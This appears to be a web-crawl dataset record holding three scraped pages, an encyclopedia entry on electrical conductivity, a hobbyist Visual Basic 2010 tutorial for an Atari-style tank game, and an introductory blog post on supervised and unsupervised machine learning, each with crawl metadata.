URL
stringlengths
15
1.68k
text_list
listlengths
1
199
image_list
listlengths
1
199
metadata
stringlengths
1.19k
3.08k
https://en.academic.ru/dic.nsf/enwiki/37410
[ "# Electrical conductivity\n\n\nElectrical conductivity\n\nElectrical conductivity or specific conductivity is a measure of a material's ability to conduct an electric current. When an electrical potential difference is placed across a conductor, its movable charges flow, giving rise to an electric current. The conductivity σ is defined as the ratio of the current density $mathbf\\left\\{J\\right\\}$ to the electric field strength $mathbf\\left\\{E\\right\\}$:\n\n:$mathbf\\left\\{J\\right\\} = sigma mathbf\\left\\{E\\right\\}$\n\nIt is also possible to have materials in which the conductivity is anisotropic, in which case σ is a 3×3 matrix (or more technically a rank-2 tensor) which is generally symmetric.\n\nConductivity is the reciprocal (inverse) of electrical resistivity and has the SI units of siemens per metre (S·m-1) i.e. if the electrical conductance between opposite faces of a 1-metre cube of material is 1 Siemens then the material's electrical conductivity is 1 Siemens per metre. Electrical conductivity is commonly represented by the Greek letter σ, but κ or γ are also occasionally used.\n\nAn EC meter is normally used to measure conductivity in a solution.\n\nClassification of materials by conductivity\n\n* A conductor such as a metal has high conductivity and a low resistance.\n* An insulator like glass or a vacuum has low conductivity.\n* The conductivity of a semiconductor is generally intermediate, but varies widely under different conditions, such as exposure of the material to electric fields or specific frequencies of light, and, most important, with temperature and composition of the semiconductor material.\n\nThe degree of doping in solid state semiconductors makes a large difference in conductivity. More doping leads to higher conductivity. The conductivity of a solution of water is highly dependent on its concentration of dissolved salts and sometimes other chemical species which tend to ionize in the solution. Electrical conductivity of water samples is used as an indicator of how salt-free or impurity-free the sample is; the purer the water, the lower the conductivity or higher.\n\nome electrical conductivities\n\nComplex conductivity\n\nTo analyse the conductivity of materials exposed to alternating electric fields, it is necessary to treat conductivity as a complex number (or as a matrix of complex numbers, in the case of anisotropic materials mentioned above) called the \"admittivity\". This method is used in applications such as electrical impedance tomography, a type of industrial and medical imaging. Admittivity is the sum of a real component called the conductivity and an imaginary component called the susceptivity. [http://www.otto-schmitt.org/OttoPagesFinalForm/Sounds/Speeches/MutualImpedivity.htm]\n\nAn alternative description of the response to alternating currents uses a real (but frequency-dependent) conductivity, along with a real permittivity. The larger the conductivity is, the more quickly the alternating-current signal is absorbed by the material (i.e., the more opaque the material is). For details, see Mathematical descriptions of opacity.\n\nTemperature dependence\n\nElectrical conductivity is strongly dependent on temperature. In metals, electrical conductivity decreases with increasing temperature, whereas in semiconductors, electrical conductivity increases with increasing temperature. Over a limited temperature range, the electrical conductivity can be approximated as being directly proportional to temperature. In order to compare electrical conductivity measurements at different temperatures, they need to be standardized to a common temperature. This dependence is often expressed as a slope in the conductivity-vs-temperature graph, and can be used:\n\n:$sigma_\\left\\{T\\text{'}\\right\\} = \\left\\{sigma_T over 1 + alpha \\left(T - T\\text{'}\\right)\\right\\}$\n\nwhere\n\n:\"σT′\" is the electrical conductivity at a common temperature, \"T′\":\"σT\" is the electrical conductivity at a measured temperature, \"T\":\"α\" is the temperature compensation slope of the material,:\"T\" is the measured absolute temperature, :\"T′\" is the common temperature.\n\nThe temperature compensation slope for most naturally occurring waters is about 2 %/°C, however it can range between (1 to 3) %/°C. This slope is influenced by the geochemistry, and can be easily determined in a laboratory.\n\nAt extremely low temperatures (not far from absolute 0 K), a few materials have been found to exhibit very high electrical conductivity in a phenomenon called superconductivity.\n\nReferences\n\nee also\n\n*Classical and quantum conductivity\n*Electrical conduction for a discussion of the physical origin of electrical conductivity.\n*Electrical resistance\n*Electrical resistivity is the inverse of electric conductivity\n*Molar conductivity for a discussion of electrolytic conductivity i.e. conductivity due to ions in solution\n*SI electromagnetism units\n*Transport phenomena\n* Thermal conductivity\n\n* [http://glassproperties.com/resistivity/ElectrResistMeasurement.htm Measurement of the Electrical Conductivity of Glass Melts] Measurement Techniques, Definitions, Electrical conductivity Calculation from the Glass Composition\n* [http://environmentalchemistry.com/yogi/periodic/electrical.html Periodic Table of Elements Sorted by Electrical Conductivity]\n\nWikimedia Foundation. 2010.\n\n### Look at other dictionaries:\n\n• electrical conductivity — savitasis laidis statusas T sritis automatika atitikmenys: angl. conductivity; electrical conductivity; specific conductivity vok. spezifischer Leitwert, m rus. удельная проводимость, f; удельная электропроводность, f pranc. conductibilité… …   Automatikos terminų žodynas\n\n• electrical conductivity — savitasis elektrinis laidis statusas T sritis chemija apibrėžtis Dydis, atvirkščiai proporcingas savitajai varžai (S/m). atitikmenys: angl. electric conductivity; electrical conductivity rus. удельная электропроводность …   Chemijos terminų aiškinamasis žodynas\n\n• electrical conductivity — savitasis elektrinis laidis statusas T sritis fizika atitikmenys: angl. electric conductivity; electrical conductivity vok. spezifische Leitfähigkeit, f; spezifischer Leitwert, m rus. удельная электропроводность, f pranc. conductivité électrique …   Fizikos terminų žodynas\n\n• Electrical conductivity — Электрическая проводимость …   Краткий толковый словарь по полиграфии\n\n• electrical conductivity — Смотри Электропроводность …   Энциклопедический словарь по металлургии\n\n• electrical conductivity — the proportionality constant between current density and applied electric field; a measure of the ease with which a material is capable of conducting an electric current …   Mechanics glossary\n\n• electrical conductivity — The ability of a material to conduct electricity. The opposite is resistivity or resistance …   Dictionary of automotive terms\n\n• Electrical conductivity meter — An electrical conductivity meter. An electrical conductivity meter (EC meter) measures the electrical conductivity in a solution. Commonly used in hydroponics, aquaculture and freshwater systems to monitor the amount of nutrients, salts or… …   Wikipedia\n\n• Electrical impedance tomography — (EIT), is a medical imaging technique in which an image of the conductivity or permittivity of part of the body is inferred from surface electrical measurements. Typically conducting electrodes are attached to the skin of the subject and small… …   Wikipedia\n\n• Electrical conduction — is the movement of electrically charged particles through a transmission medium (electrical conductor). The movement of charge constitutes an electric current. The charge transport may result as a response to an electric field, or as a result of… …   Wikipedia" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7896425,"math_prob":0.971557,"size":7370,"snap":"2019-43-2019-47","text_gpt3_token_len":1573,"char_repetition_ratio":0.23730655,"word_repetition_ratio":0.022132797,"special_character_ratio":0.17123474,"punctuation_ratio":0.11219081,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96673876,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T12:27:04Z\",\"WARC-Record-ID\":\"<urn:uuid:e328a88e-ac1e-4cd2-80e9-2e2ada1dbc5c>\",\"Content-Length\":\"48811\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9df2a21b-f622-484b-9bf3-ce02119826c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:796c6fad-028a-4955-9bf7-04f32a1a4bd2>\",\"WARC-IP-Address\":\"95.217.42.33\",\"WARC-Target-URI\":\"https://en.academic.ru/dic.nsf/enwiki/37410\",\"WARC-Payload-Digest\":\"sha1:25FQ6BOV6NPND2Q6EU3JR6NKXWXLCP74\",\"WARC-Block-Digest\":\"sha1:QB2EH5BFLTN2W3V5WW6HJSIFXFE3U754\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670558.91_warc_CC-MAIN-20191120111249-20191120135249-00305.warc.gz\"}"}
https://www.instructables.com/Atari-Combat-Tank-vb-2010/
[ "## Introduction: Atari Combat: Tank Vb 2010\n\nThis is my first instructable so bear with me... for my vb final i decided to program atari combat tank everything worked out other than when i hit a barricade the tanks r unable to move...\n\n## Step 1: Open VB2010\n\nOpen Visual Basic 2010 and select new project name the project anything you want i just kept mine as windowsapplication1 make sure Windows Forms Application is selected and click OK\n\n## Step 2: Designing the Form\n\non form 1 you will need a button.... on my form i added 3 labels and 2 pictureboxes\n\n## Step 3: Form 1 Code\n\ndouble click the button to show the code and add the following:\n\nTank_VS_Tank.Show()\n\n## Step 4: Adding Form 2\n\nto add a new form go to the menu strip item \"project\" and select \"Add Windows Form\" and select \"Windows Form\" name it what you want and click \"add\"\n\n## Step 5: Form 2 Design\n\nadd 16 timers 2 labels and 11 pictureboxes\n\nplace 9 pictureboxes at the bottom of the form and place one picturebox at the middle left and middle right of the form\n\nplace the labels at the top left and top right of the form\n\n## Step 6: Form 2 Propertys\n\nselect form 2 and click the property's toolbar on the right side of the form.\n\nselect backcolor and change it to 0, 64, 0 or a dark green\n\nchange forecolor to transparent\n\nchange formborderstyle to fixedtoolwindow\n\nchange start position to center screen\n\nand window state to maximized\n\n## Step 7: Label Property's\n\nselect the label on the left side and change the following:\n\nbackcolor: transparent\n\nborderstyle: none\n\nfont: IMPACT, 24pt\n\nforecolor: red\n\ntext: 0\n\nname: rs\n\nlocation: 7, 14\n\nautosize: false\n\nsize: 57,57\n\ndo the same for the label on the right but change the color to blue and name to bs\n\n## Step 8: Picturebox Property's\n\nchange the property's for the the picturebox on the left:\n\nbackcolor: backcolor of form2\n\nimage: download the red tank in the picture above... and that will be the red tank\n\nname: tank1\n\nlocation: 16, 517\n\nsize: 30,30\n\nchange the picturebox property's on the right to the same as on the left except the following:\n\nimage download the blue tank in the picture above... that will be the blue tank\n\nlocation: 1644, 517\n\nname: tank2\n\nfor the first four pictureboxes at the bottom of the form change the following:\n\nname: name them as the notes in the pictures above\n\n## Step 9: The Code: Dimensions\n\njust under public class add this code ,,, these are the variables we will use later in the code\n\n'we will use k to tell us the direction the tank2 is facing\n\nDim k As Integer = 4 'tank2 side counter\n\n'we will use s to tell us the direction of tank1\n\nDim s As Integer = 3 'tank1 side counter\n\n'b(17) is an object array there is not much online about object arrays so if i get enough attention i might make an 'instructable on it\n\nDim b(17) As PictureBox 'picturebox array\n\n'bt/rt is used to detect if both tank hit the border\n\nDim bt As Boolean = False\n\nDim rt As Boolean = False\n\n## Step 10: The Code:tank_vs_tank_keyup\n\nkey up is a handler that detects when a key is let up\n\ndouble click form2 and select the declaration toolbar at the top of the code and select keyup\nadd the following code after the dimensions:\n\nSelect Case e.KeyCode\nCase Is = Keys.W\n\nTimer9.Enabled = False 'stops tank move when w key up\n\nCase Is = Keys.S\n\nTimer10.Enabled = False 'stops tank move when s key up\n\nCase Is = Keys.D\n\nTimer11.Enabled = False 'stops tank move when d key up\n\nCase Is = Keys.A\n\nTimer12.Enabled = False 'stops tank move when a key up\n\nCase Is = Keys.ControlKey 'shoots\n\nIf s = 1 Then Timer1.Enabled = True 'detects if tank1 face right\n\nIf s = 2 Then Timer2.Enabled = True 'detects if tank1 face left\n\nIf s = 3 Then Timer3.Enabled = True 'detects if tank1 face up\n\nIf s = 4 Then Timer4.Enabled = True 'detects if tank1 face down\n\nEnd Select\n\n'left tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.Up\n\nTimer13.Enabled = False 'stops tank move when up key up\n\nCase Is = Keys.Down\n\nTimer14.Enabled = False 'stops tank move when down key up\n\nCase Is = Keys.Left\n\nTimer15.Enabled = False 'stops tank move when left key up\n\nCase Is = Keys.Right\n\nTimer16.Enabled = False 'stops tank move when right key up\n\nCase Is = Keys.Enter 'shoots\n\nIf k = 1 Then Timer5.Enabled = True 'detects if tank2 face right\n\nIf k = 2 Then Timer6.Enabled = True 'detects if tank2 face left\n\nIf k = 3 Then Timer7.Enabled = True 'detects if tank2 face up\n\nIf k = 4 Then Timer8.Enabled = True 'detects if tank1 face down\n\nEnd Select\n\n## Step 11: The Code: Object Array\n\nthe following is code for 17 pictureboxes... these will act as our blocks the code will go after the private sub statment\n\n\"Private Sub Tank_VS_Tank_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load\"\n\nFor i = 1 To 17\n\nb(i) = New PictureBox 'adds new picbox\n\nb(i).Visible = True 'makes block visible\n\nb(i).BackColor = Color.Khaki 'makes color of blocker khaki\n\nNext\n\nWith b(1) 'size and place block 1\n\n.Height = 22\n\n.Width = 100\n\n.Left = 81\n\n.Top = 138\n\nEnd With\n\nWith b(2) 'size and place block 2\n\n.Height = 200\n\n.Width = 22\n\n.Left = 159\n\n.Top = 159\n\nEnd With\n\nWith b(3) 'size and place block 3\n\n.Height = 200\n\n.Width = 22\n\n.Top = 350\n\n.Left = 159\n\nEnd With\n\nWith b(4) 'size and place block 4\n\n.Height = 22\n\n.Width = 100\n\n.Left = 81\n\n.Top = 550\n\nEnd With\n\nWith b(5) 'size and place block 5\n\n.Height = 22\n\n.Width = 100\n\n.Left = 404\n\n.Top = 0\n\nEnd With\n\nWith b(6) 'size and place block 6\n\n.Height = 200\n\n.Width = 22\n\n.Left = 443\n\n.Top = 22\n\nEnd With\n\nWith b(7) 'size and place block 7\n\n.Height = 200\n\n.Width = 23\n\n.Left = 443\n\n.Top = 484\n\nEnd With\n\nWith b(8) 'size and place block 8\n\n.Height = 22\n\n.Width = 100\n\n.Top = 680\n\n.Left = 404\n\nEnd With\n\nWith b(9) 'size and place block 9\n\n.Height = 200\n\n.Width = 22\n\n.Left = 631\n\n.Top = 253\n\nEnd With\n\nWith b(10) 'size and place block 10\n\n.Height = 22\n\n.Width = 100\n\n.Left = 802\n\n.Top = 0\n\nEnd With\n\nWith b(11) 'size and place block 11\n\n.Height = 200\n\n.Width = 22\n\n.Left = 841\n\n.Top = 22\n\nEnd With\n\nWith b(12) 'size and place block 12\n\n.Height = 200\n\n.Width = 22\n\n.Left = 841\n\n.Top = 484\n\nEnd With\n\nWith b(13) 'size and place block 13\n\n.Height = 22\n\n.Width = 100\n\n.Left = 802\n\n.Top = 680\n\nEnd With\n\nWith b(14) 'size and place block 14\n\n.Height = 22\n\n.Width = 100\n\n.Left = 1125\n\n.Top = 137\n\nEnd With\n\nWith b(15) 'size and place block 15\n\n.Height = 200\n\n.Width = 22\n\n.Left = 1125\n\n.Top = 159\n\nEnd With\n\nWith b(16) 'size and place block 16\n\n.Height = 200\n\n.Width = 22\n\n.Left = 1125\n\n.Top = 350\n\nEnd With\n\nWith b(17) 'size and place block 17\n\n.Height = 22\n\n.Width = 100\n\n.Left = 1125\n\n.Top = 550\n\nEnd With\n\nEnd Sub\n\n## Step 12: The Code: Keydown\n\nkey down detects if a key is down the code goes after private sub tank_vs_tank_keydown\n\nselect the declarations for the form 1 code and select keydown\n\nPrivate Sub Tank_VS_Tank_KeyDown(ByVal sender As Object, ByVal e As System.Windows.Forms.KeyEventArgs) Handles Me.KeyDow\n\n'right tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.W 'moves tank1 up and changes the counter to 3 and the image to tank face up\n\nIf tank1.Top = Me.Top Then Timer9.Enabled = False\n\ns = 3\n\nTimer9.Enabled = True\n\nTimer10.Enabled = False\n\nTimer11.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt1.Image\n\nCase Is = Keys.S 'moves tank1 down and changes the counter to 4 and the image to tank face down\n\nIf tank1.Bottom = Me.Bottom Then Timer10.Enabled = False\n\ns = 4\n\nTimer10.Enabled = True\n\nTimer9.Enabled = False\n\nTimer11.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt3.Image\n\nCase Is = Keys.D 'moves tank1 right and changes the counter to 1 and the image to tank face right\n\nIf tank1.Right = Me.Right Then Timer11.Enabled = False\n\ns = 1\n\nTimer11.Enabled = True\n\nTimer9.Enabled = False\n\nTimer10.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt4.Image\n\nCase Is = Keys.A 'moves tank1 left and changes the counter to 2 and the image to tank face left\n\nIf tank1.Left = Me.Left Then Timer12.Enabled = False\n\ns = 2\n\nTimer12.Enabled = True\n\nTimer9.Enabled = False\n\nTimer10.Enabled = False\n\nTimer11.Enabled = False\n\ntank1.Image = rt2.Image\n\nCase Is = Keys.P\n\nMsgBox(\"Paused Press OK to Continue\")\n\nEnd Select\n\nramo.Left = tank1.Left + 15\n\nramo.Top = tank1.Top + 13\n\nFor re = 1 To 17\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer9.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer10.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer11.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer12.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then rt = True\n\nNext\n\nIf tank1.Top < Me.Top + 15 Then tank1.Top += 6\n\nIf tank1.Bottom > Me.Bottom - 35 Then tank1.Top -= 6\n\nIf tank1.Right > Me.Right - 15 Then tank1.Left -= 6\n\nIf tank1.Left < Me.Left + 10 Then tank1.Left += 6\n\n'left tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.Up 'moves tank2 up and changes the counter to 4 and the image to tank face up\n\nk = 4\n\nTimer13.Enabled = True\n\nTimer14.Enabled = False\n\nTimer15.Enabled = False\n\nTimer16.Enabled = False\n\ntank2.Image = bt1.Image\n\nCase Is = Keys.Down 'moves tank2 down and changes the counter to 3 and the image to tank face down\n\nk = 3\n\nTimer14.Enabled = True\n\nTimer15.Enabled = False\n\nTimer16.Enabled = False\n\nTimer13.Enabled = False\n\ntank2.Image = bt3.Image\n\nCase Is = Keys.Left 'moves tank2 right and changes the counter to 1 and the image to tank face right\n\nk = 1\n\nTimer15.Enabled = True\n\nTimer16.Enabled = False\n\nTimer13.Enabled = False\n\nTimer14.Enabled = False\n\ntank2.Image = bt2.Image\n\nCase Is = Keys.Right 'moves tank2 left and changes the counter to 2 and the image to tank face left\n\nk = 2\n\nTimer16.Enabled = True\n\nTimer13.Enabled = False\n\nTimer14.Enabled = False\n\nTimer15.Enabled = False\n\ntank2.Image = bt4.Image\n\nEnd Select\n\nbamo.Left = tank2.Left + 15 'places blue ammo\n\nbamo.Top = tank2.Top + 13\n\nFor ree = 1 To 17\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer13.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer14.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer15.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer16.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then bt = True\n\nNext\n\nIf rt = True And bt = True Then reset()\n\nIf tank2.Top < Me.Top + 15 Then tank2.Top += 5\n\nIf tank2.Bottom > Me.Bottom + 35 Then tank2.Top -= 5\n\nIf tank2.Right > Me.Right - 15 Then tank2.Left -= 5\n\nIf tank2.Left < Me.Left + 5 Then tank2.Left += 5\n\nEnd Sub\n\n## Step 13: The Code: Red Bullet\n\ngo to the form2 design page and select timers 1 to 4 and press enter\n\nPrivate Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick 'fires red ammo right\n\nramo.Left += 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer1.Enabled = False\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then reset()\n\nt()\n\nIf ramo.Right > Me.Right Then Timer1.Enabled = False\n\nFor rer = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rer).Bounds) Then Timer1.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick 'fires red ammo left\n\nramo.Left -= 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer2.Enabled = False\n\nt()\n\nIf ramo.Left < Me.Left Then Timer2.Enabled = False\n\nFor rere = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rere).Bounds) Then Timer2.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick 'fires red ammo up\n\nramo.Top -= 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer3.Enabled = False\n\nt()\n\nIf ramo.Top < Me.Top Then Timer3.Enabled = False\n\nFor rerer = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rerer).Bounds) Then Timer3.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer4_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer4.Tick 'fires red ammo down\n\nramo.Top += 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer4.Enabled = False\n\nt()\n\nIf ramo.Bottom > Me.Bottom Then Timer4.Enabled = False\n\nFor ri = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(ri).Bounds) Then Timer4.Enabled = False\n\nNext\n\nEnd Sub\n\n## Step 14: The Code: Blue Bullet\n\nselect timers 5 to 8 and press enter\n\nPrivate Sub Timer5_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer5.Tick 'fires blue ammo left\n\nbamo.Left -= 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer5.Enabled = False\n\nt2()\n\nIf bamo.Left < Me.Left Then Timer5.Enabled = False\n\nFor rir = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(rir).Bounds) Then Timer5.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer6_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer6.Tick 'fires blue ammo right\n\nbamo.Left += 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer6.Enabled = False\n\nt2()\n\nIf bamo.Right > Me.Right Then Timer6.Enabled = False\n\nFor riri = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(riri).Bounds) Then Timer6.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer7_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer7.Tick 'fires blue ammo down\n\nbamo.Top += 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer7.Enabled = False 'stops timer\n\nt2()\n\nIf bamo.Bottom > Me.Bottom Then Timer7.Enabled = False 'if bamo is > form2 bottom ammo\n\nFor ririr = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(ririr).Bounds) Then Timer7.Enabled = False 'detects if bamo hits blocks\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer8_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer8.Tick 'fires blue ammo up\n\nbamo.Top -= 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer8.Enabled = False 'stops timer\n\nt2()\n\nIf bamo.Top < Me.Top Then Timer8.Enabled = False 'if bamo is < form2 top ammo\n\nFor ririri = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(ririri).Bounds) Then Timer8.Enabled = False 'detects if bamo hits blocks\n\nNext\n\nEnd Sub\n\n## Step 15: The Code: Red Tank Movement\n\nto move the red tank i use 4 timers each for either up down left or right in form2 design select timers 9-12 and press enter add the following code to each:\n\nPrivate Sub Timer9_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer9.Tick 'up\ntank1.Top -= 5\n\ntank1.Image = rt1.Image\n\nEnd Sub\n\nPrivate Sub Timer10_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer10.Tick 'down\ntank1.Top += 5\n\ntank1.Image = rt3.Image\n\nEnd Sub\n\nPrivate Sub Timer11_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer11.Tick 'left\n\ntank1.Left += 5\n\ntank1.Image = rt4.Image\n\nEnd Sub\n\nPrivate Sub Timer12_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer12.Tick 'right\n\ntank1.Left -= 5\n\ntank1.Image = rt2.Image\n\nEnd Sub\n\n## Step 16: The Code: Blue Tank Movement\n\nfor the blue tank i did the same except in different timers so in form2 design select timers 13-16 and press enter add the following code to each:\n\nPrivate Sub Timer13_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer13.Tick 'up\ntank2.Top -= 5\n\ntank2.Image = bt1.Image\n\nEnd Sub\n\nPrivate Sub Timer14_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer14.Tick\n\n'down\n\ntank2.Top += 5\n\ntank2.Image = bt3.Image\n\nEnd Sub\n\nPrivate Sub Timer15_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer15.Tick 'left\n\ntank2.Left -= 5\n\ntank2.Image = bt2.Image\n\nEnd Sub\n\nPrivate Sub Timer16_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer16.Tick 'right\n\ntank2.Left += 5\n\ntank2.Image = bt4.Image\n\nEnd Sub\n\n## Step 17: The Code: Suberteens\n\nin my code i had things like: t(), t2(), and reset() those are my subs t() detects if the red ammo hits the form borders or the blue tank; t2() detects if the blue ammo hits the red tank or the form; and reset() resets the game field\n\nheres the code for t():\n\nPrivate Sub t()\nIf rambo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Image = extank.Image\n\nIf rambo.Bounds.IntersectsWith(tank2.Bounds) Then tank1.Left = 12\n\nIf rambo.Bounds.IntersectsWith(tank2.Bounds) Then tank1.Top = 336\n\nIf rambo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Left = 1233\n\nIf rambo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Top = 336\n\nEnd Sub\n\nthe code for t2():\n\nPrivate Sub t2()\n\nIf bami.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Image = extank.Image\n\nIf bami.Bounds.IntersectsWith(tank1.Bounds) Then tank2.Left = 1233\n\nIf bami.Bounds.IntersectsWith(tank1.Bounds) Then tank2.Top = 336\n\nIf bami.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Left = 12\n\nIf bami.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Top = 336\n\nEnd Sub\n\nthe code for reset()\n\nPrivate Sub reset()\n\ntank1.Left = 12\n\ntank1.Top = 336\n\ntank2.Left = 1233\n\ntank2.Top = 336\n\nbt = False\n\nrt = False\n\nEnd Sub\n\n## Step 18: The End\n\nthanks for looking at my instructable please give feedback", null, "Participated in the\nGame.Life 4 Contest", null, "Participated in the\nMakerlympics Contest" ]
[ null, "https://www.instructables.com/assets/img/pixel.png", null, "https://www.instructables.com/assets/img/pixel.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61101913,"math_prob":0.9799904,"size":17120,"snap":"2023-40-2023-50","text_gpt3_token_len":4898,"char_repetition_ratio":0.21295863,"word_repetition_ratio":0.17411348,"special_character_ratio":0.2879673,"punctuation_ratio":0.16251384,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9815528,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T10:04:07Z\",\"WARC-Record-ID\":\"<urn:uuid:3739231c-421b-452f-b450-d44ffd73c815>\",\"Content-Length\":\"133381\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e361fd7c-da87-4bf4-92e0-20ab8e7745a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:b01c570c-0630-4fd4-b02d-cb94bd1956ee>\",\"WARC-IP-Address\":\"146.75.29.105\",\"WARC-Target-URI\":\"https://www.instructables.com/Atari-Combat-Tank-vb-2010/\",\"WARC-Payload-Digest\":\"sha1:2WDYUV4X43IHESNU6PDZJOJS4TOQUP4I\",\"WARC-Block-Digest\":\"sha1:OF5H5RCQNTORT243CZ3XHBYUC2UTSVJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103810.88_warc_CC-MAIN-20231211080606-20231211110606-00415.warc.gz\"}"}
http://www.develbyte.in/machine-learning/what-is-machine-learning/
[ "# What is Machine Learning?\n\nMachine learning is a field of study that provides computers with the ability to learn without being explicitly programmed - Arthur Samuel.\n\nMachine learning is a part of computer science which focuses on the development of computer programs that can teach themselves to grow and change based on the data it is exposed to.\n\nMachine learning algorithms are used heavily in mining large data sets like click stream data, flight data, engineering data, sensor data etc. Machine learning programs detect patterns in data and adjust program actions accordingly. For example, Facebook’s News Feed changes according to the user’s personal interactions with other users. If a user frequently tags a friend in photos, writes on his wall or “likes” his links, the News Feed will show more of that friend’s activity in the user’s News Feed due to presumed closeness.\n\nMachine learning algorithms plays  a big role solving complex problems which cannot be programmed like flying an Aircraft, DNA sequencing, Genome Analysis.\n\nThe machine learning algorithms can be classified into two main categories:\n\n• Supervised Learning Algorithms\n• Unsupervised Learning Algorithms\n\n### Supervised learning algorithms\n\nThe majority of practical machine learning uses supervised learning. In a supervised machine learning algorithm we start with a data set which contains both the inputs and the corresponding correct answer and we train the algorithm to learn a function good enough to predict the correct or approximate correct output for a new given input value which it have not seen before.\n\nThe supervised learning algorithms can be further grouped under Regression and Classification problems.\n\nRegression All the algorithms used to predict a continuous number as output for a given input, then its a Regression algorithm.\n\ne.g: if we are trying to predict the price of a house, based on history of real state transaction data its a Regression problem since the price is continuous number.\n\nClassification All the algorithms where we try to predict a the group in which a given input falls in is a Classification problem.\n\ne.g. if we are trying to predict if the given email is spam or not, its a classification problem, since there the two groups span and not-spam and we are trying to put the given input in one of there,  the number of groups can be two or more then two. let take another example let say given a bunch of images we want to predict of there is a cat, dog, horse or a tiger\n\n### Unsupervised  learning algorithms\n\nIn this type of learning algorithms we use to only have input data, the corresponding output is unknown and the algorithms are left to their own to discover and present the interesting structure in the data, The goal for unsupervised learning is to model the underlying structure" ]
[ null ]
